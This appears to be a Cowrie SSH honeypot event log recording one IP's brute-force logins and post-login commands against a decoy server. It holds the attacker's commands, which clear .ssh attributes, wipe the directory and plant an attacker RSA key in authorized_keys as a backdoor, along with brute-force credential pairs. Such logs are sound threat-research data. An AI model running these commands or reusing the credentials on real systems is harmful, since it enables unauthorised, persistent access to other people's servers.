{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:54:36.154091Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:36.154980Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56012,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1d9cf37369d","protocol":"ssh","message":"New connection: 212.227.235.229:56012 (1.2.3.4:22) [session: b1d9cf37369d]","sensor":"my-vps","timestamp":"2025-09-08T21:54:36.341115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:36.342450Z","src_ip":"212.227.235.229","session":"b1d9cf37369d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:36.521305Z","src_ip":"212.227.235.229","session":"b1d9cf37369d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:54:37.240681Z","src_ip":"212.227.235.229","session":"b1d9cf37369d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:38.424345Z","src_ip":"212.227.235.229","session":"b1d9cf37369d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56016,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e004dd03859","protocol":"ssh","message":"New connection: 212.227.235.229:56016 (1.2.3.4:22) [session: 1e004dd03859]","sensor":"my-vps","timestamp":"2025-09-08T21:54:38.616266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:38.617032Z","src_ip":"212.227.235.229","session":"1e004dd03859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:38.803935Z","src_ip":"212.227.235.229","session":"1e004dd03859"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:54:39.594598Z","src_ip":"212.227.235.229","session":"1e004dd03859"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:39.769138Z","src_ip":"212.227.235.229","session":"27c2cbaa47d3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:39.783270Z","src_ip":"212.227.235.229","session":"1e004dd03859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57358,"dst_ip":"1.2.3.4","dst_port":22,"session":"d34260459330","protocol":"ssh","message":"New connection: 212.227.235.229:57358 (1.2.3.4:22) [session: d34260459330]","sensor":"my-vps","timestamp":"2025-09-08T21:54:56.107702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:54:56.108567Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:54:56.358762Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:54:57.400717Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:58.531096Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:58.531789Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:54:58.532522Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:58.783898Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:59.790995Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:54:59.791706Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:55:00.047945Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:00.048815Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57374,"dst_ip":"1.2.3.4","dst_port":22,"session":"14a43fd1a46f","protocol":"ssh","message":"New connection: 212.227.235.229:57374 (1.2.3.4:22) [session: 14a43fd1a46f]","sensor":"my-vps","timestamp":"2025-09-08T21:55:01.035743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:01.036521Z","src_ip":"212.227.235.229","session":"14a43fd1a46f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34850,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf02b4cd6535","protocol":"ssh","message":"New connection: 212.227.235.229:34850 (1.2.3.4:22) [session: cf02b4cd6535]","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.161400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.163750Z","src_ip":"212.227.235.229","session":"cf02b4cd6535"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.245248Z","src_ip":"212.227.235.229","session":"14a43fd1a46f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.453862Z","src_ip":"212.227.235.229","session":"cf02b4cd6535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60406,"dst_ip":"1.2.3.4","dst_port":22,"session":"d732afde3da8","protocol":"ssh","message":"New connection: 212.227.235.229:60406 (1.2.3.4:22) [session: d732afde3da8]","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.471730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.472677Z","src_ip":"212.227.235.229","session":"d732afde3da8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:02.728269Z","src_ip":"212.227.235.229","session":"d732afde3da8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:03.001211Z","src_ip":"212.227.235.229","session":"14a43fd1a46f"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"2025","message":"login attempt [anonymous/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:03.657655Z","src_ip":"212.227.235.229","session":"cf02b4cd6535"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"!","message":"login attempt [esuser/!] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:03.795776Z","src_ip":"212.227.235.229","session":"d732afde3da8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:04.255184Z","src_ip":"212.227.235.229","session":"14a43fd1a46f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:04.949289Z","src_ip":"212.227.235.229","session":"cf02b4cd6535"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:05.052977Z","src_ip":"212.227.235.229","session":"d732afde3da8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55616,"dst_ip":"1.2.3.4","dst_port":22,"session":"04f6540a07f4","protocol":"ssh","message":"New connection: 212.227.235.229:55616 (1.2.3.4:22) [session: 04f6540a07f4]","sensor":"my-vps","timestamp":"2025-09-08T21:55:05.260695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:05.261875Z","src_ip":"212.227.235.229","session":"04f6540a07f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:06.469045Z","src_ip":"212.227.235.229","session":"04f6540a07f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:55:07.220899Z","src_ip":"212.227.235.229","session":"04f6540a07f4"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:07.471311Z","src_ip":"212.227.235.229","session":"d34260459330"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:07.472354Z","src_ip":"212.227.235.229","session":"04f6540a07f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33192,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca3a6ae046b","protocol":"ssh","message":"New connection: 212.227.235.229:33192 (1.2.3.4:22) [session: cca3a6ae046b]","sensor":"my-vps","timestamp":"2025-09-08T21:55:16.076922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:16.077813Z","src_ip":"212.227.235.229","session":"cca3a6ae046b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:16.389088Z","src_ip":"212.227.235.229","session":"cca3a6ae046b"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"2025","message":"login attempt [pcp/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:55:17.674144Z","src_ip":"212.227.235.229","session":"cca3a6ae046b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:55:18.987813Z","src_ip":"212.227.235.229","session":"cca3a6ae046b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33732,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfd0ebebbb58","protocol":"ssh","message":"New connection: 212.227.235.229:33732 (1.2.3.4:22) [session: dfd0ebebbb58]","sensor":"my-vps","timestamp":"2025-09-08T21:55:27.793052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:55:27.809803Z","src_ip":"212.227.235.229","session":"dfd0ebebbb58"}
